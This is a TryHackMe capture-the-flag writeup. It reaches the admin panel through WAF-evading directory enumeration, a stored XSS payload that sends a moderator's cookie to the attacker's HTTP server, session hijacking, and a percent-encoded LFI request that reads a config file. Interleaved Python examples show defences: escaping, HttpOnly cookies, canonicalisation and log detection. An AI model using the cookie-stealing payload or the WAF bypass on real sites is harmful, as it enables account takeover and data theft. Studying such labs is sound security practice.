Paddelify – TryHackMe challenge

Description

You’ve signed up for the Padel Championship, but your rival keeps climbing the leaderboard. The admin panel controls match approvals and registrations. Can you crack the admin and rewrite the draw before the whistle?
Note: In case you want to start over or restart all services, visit http://10.82.162.200/status.php

Directories enumeration

First I used a common feroxbuster command to discover directories, but it found only cgi-bin:

feroxbuster -u 'http://10.82.162.200' -w /media/sf_wordlists/SecLists-master/Discovery/Web-Content/big.txt

As the challenge is related to WAF rule bypassing techniques, I used a fancier feroxbuster command with several additional options to simulate normal user activity:

feroxbuster -t 3 --random-agent -H "X-Forwarded-For: 127.0.0.1" -H "X-Real-IP: 127.0.0.1" -H "X-Originating-IP: 127.0.0.1" --timeout 5 -u 'http://10.82.162.200' -w /media/sf_wordlists/SecLists-master/Discovery/Web-Content/big.txt

feroxbuster found several interesting directories:

  • http://10.82.162.200/config/ -> directory listing is enabled
  • http://10.82.162.200/logs/error.log
  • http://10.82.162.200/index.php – user account registration panel

Under http://10.82.162.200/config/ we can see the app.conf file, but we do not have access to this file, as requesting it triggers the WAF.

Registering user account and stealing cookie

I registered a new account named player using the panel here: http://10.82.162.200/index.php . After registering I got information that the moderator will review my request.
As the moderator is reviewing requests, there is a chance to steal the moderator’s cookie.
I started an HTTP server on my Kali Linux:

python3 -m http.server

I tried to put a malicious payload into the username field during registration of a user. When the moderator reviews this request, the payload will trigger stealing of the moderator’s cookie.
Unfortunately the moderator was not clicking on every link, so I needed something triggered without any interaction.
I tried many techniques to obfuscate the payload, but the working one was:

<<SCRIPT>var i=new Image(); i.src="http://MY_MACHINE_IP:8000/?c="+document['co'+'ok'+'ie'];</SCRIPT>

After a short while I got the moderator’s cookie.

I replaced the PHPSESSID cookie value in my browser storage with the value stolen from the moderator’s session and refreshed the page. I got access to the moderator dashboard and the first flag.

I changed my password using the form at the bottom of the dashboard, just in case my session cookie expired.
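The stored payload above only works because two things are true at once: the moderator panel renders the submitted username as raw HTML, and the session cookie is readable from document.cookie. The following is an added example (not code from the challenge or from this writeup) that shows the defender's side of both points in Python: a hypothetical moderator-panel row renderer in its vulnerable and hardened forms, and a Set-Cookie header for PHPSESSID with HttpOnly set. The payload string reused as input is the one shown above; the row template, the function names and the session id value are assumptions constructed for the example.

```python
import html
from http.cookies import SimpleCookie

# Constructed sample input: the username string submitted on the registration
# form in the writeup above, used here only as the input to the defences.
SUBMITTED_USERNAME = (
    '<<SCRIPT>var i=new Image(); i.src="http://MY_MACHINE_IP:8000/?c="'
    "+document['co'+'ok'+'ie'];</SCRIPT>"
)


def render_pending_row_vulnerable(username: str) -> str:
    """Hypothetical moderator-panel template that inlines the username as raw
    HTML. This is the pattern that lets a stored payload execute as soon as the
    moderator opens the review page, with no click required."""
    return f"<tr><td>{username}</td><td>pending</td></tr>"


def render_pending_row_hardened(username: str) -> str:
    """Same row, with HTML entity encoding applied at the output point.
    quote=True also encodes ' and \" so the value is safe inside attributes."""
    return f"<tr><td>{html.escape(username, quote=True)}</td><td>pending</td></tr>"


def contains_live_script_tag(rendered_html: str) -> bool:
    """Crude check used only by this example: is an unescaped <script opener
    left in the rendered output? Case-insensitive, so '<SCRIPT>' counts too."""
    return "<script" in rendered_html.lower()


def session_cookie_header(session_id: str) -> str:
    """Build a Set-Cookie header value for PHPSESSID with HttpOnly, Secure and
    SameSite set. HttpOnly is the flag that keeps document.cookie from
    exposing the session id to script running in the page, which is exactly
    what the payload above relies on."""
    cookie = SimpleCookie()
    cookie["PHPSESSID"] = session_id
    cookie["PHPSESSID"]["httponly"] = True
    cookie["PHPSESSID"]["secure"] = True
    cookie["PHPSESSID"]["samesite"] = "Lax"
    cookie["PHPSESSID"]["path"] = "/"
    return cookie["PHPSESSID"].OutputString()


if __name__ == "__main__":
    print(render_pending_row_vulnerable(SUBMITTED_USERNAME))
    print(render_pending_row_hardened(SUBMITTED_USERNAME))
    print(session_cookie_header("constructed-session-id"))  # constructed id
```

The point of the hardened renderer is that it does not try to recognise the payload at all: every `<`, `>`, `"` and `'` is entity-encoded, so the obfuscation tricks (doubled `<<`, upper-case `SCRIPT`, concatenated `'co'+'ok'+'ie'`) that got past the input-side filter are irrelevant. The HttpOnly flag is the second layer: even if some other injection slips through, document.cookie no longer returns the session id.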

LFI – accessing config/app.conf

I clicked on the “Live” link at the top of the page and noticed that the URL has the structure
http://10.82.162.200/live.php?page=match.php, so potentially we can access config/app.conf using this link.
Simply trying to access http://10.82.162.200/live.php?page=config/app.conf resulted in triggering the WAF and a forbidden error.
URL-encoding all characters helped to bypass the WAF:

http://10.82.162.200/live.php?page=%63%6f%6e%66%69%67%2f%61%70%70%2e%63%6f%6e%66

The admin_info value is the password to the admin panel. I logged in using the username admin and this password.
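The WAF here was evidently matching the raw query string against the protected path, which is why percent-encoding every character slipped past it. As an added example (not code from the challenge, the writeup, or any real WAF), the Python below models the two approaches side by side: a naive matcher on the raw `page` value, and one that canonicalises the value first (percent-decodes, including a second pass for double encoding, collapses `../`, strips leading slashes). It also shows the fix that removes the problem at the application layer, an allow-list for what `live.php?page=` may include, and a detection function that runs the same canonicalisation over a few constructed access-log lines so that the encoded request is flagged even though the server answered it with 200. The allow-list contents (`match.php` is from the page, `schedule.php` is made up), the protected prefixes, the log lines and all function names are assumptions for the example.

```python
import posixpath
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Assumed allow-list of includable pages. match.php appears in the writeup;
# schedule.php is constructed for the example.
ALLOWED_PAGES = {"match.php", "schedule.php"}

# Prefixes the WAF in the writeup is evidently trying to protect (assumption).
BLOCKED_PREFIXES = ("config/", "logs/")


def naive_waf_blocks(raw_page_param: str) -> bool:
    """Models a signature that compares the raw query value against the
    blocked prefixes. A percent-encoded value never matches: this is the gap
    the URL-encoded request above walks through."""
    return raw_page_param.startswith(BLOCKED_PREFIXES)


def canonical_page(raw_page_param: str) -> str:
    """Canonicalise a page parameter before any decision is made on it:
    decode twice (catches double encoding), treat backslashes as slashes,
    collapse ./ and ../ segments, and drop leading slashes."""
    decoded = unquote(unquote(raw_page_param))
    normalized = posixpath.normpath("/" + decoded.replace("\\", "/"))
    return normalized.lstrip("/")


def normalized_waf_blocks(raw_page_param: str) -> bool:
    """Same rule as naive_waf_blocks, applied to the canonical form."""
    return canonical_page(raw_page_param).startswith(BLOCKED_PREFIXES)


def resolve_include(raw_page_param: str) -> Optional[str]:
    """Hardened replacement for the include behind live.php?page=...:
    return the file to include only if its canonical form is on the
    allow-list, otherwise None. With an allow-list there is nothing for an
    encoding trick to bypass, because unknown values are rejected by default."""
    page = canonical_page(raw_page_param)
    return page if page in ALLOWED_PAGES else None


# Constructed access-log lines in combined-log style (not real server logs).
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /live.php?page=match.php HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /live.php?page=config/app.conf HTTP/1.1" 403 0',
    '10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] '
    '"GET /live.php?page=%63%6f%6e%66%69%67%2f%61%70%70%2e%63%6f%6e%66 HTTP/1.1" 200 1024',
]

_REQUEST_LINE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')


def flag_suspicious_requests(log_lines: List[str]) -> List[Tuple[int, str]]:
    """Return (line_index, canonical_page) for every request whose page
    parameter canonicalises to a protected prefix, regardless of the status
    code the server returned. The 403 and the 200 are both reported, which is
    the difference between a detection rule and the WAF's raw-string match."""
    hits = []
    for idx, line in enumerate(log_lines):
        match = _REQUEST_LINE.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for raw_value in parse_qs(query).get("page", []):
            page = canonical_page(raw_value)
            if page.startswith(BLOCKED_PREFIXES):
                hits.append((idx, page))
    return hits


if __name__ == "__main__":
    encoded = "%63%6f%6e%66%69%67%2f%61%70%70%2e%63%6f%6e%66"
    print("naive blocks encoded request:", naive_waf_blocks(encoded))
    print("normalized blocks encoded request:", normalized_waf_blocks(encoded))
    print("include resolves to:", resolve_include(encoded))
    print("flagged log entries:", flag_suspicious_requests(SAMPLE_ACCESS_LOG))
```

Two design notes. Canonicalisation belongs before matching, never after, and the same function should be shared by the request filter and the log-based detection so that what one lets through the other still sees. And the allow-list is the real fix: a blocklist, however well it normalises, has to anticipate every representation of a forbidden path, while `resolve_include` only has to recognise the handful of pages the application actually wants to serve.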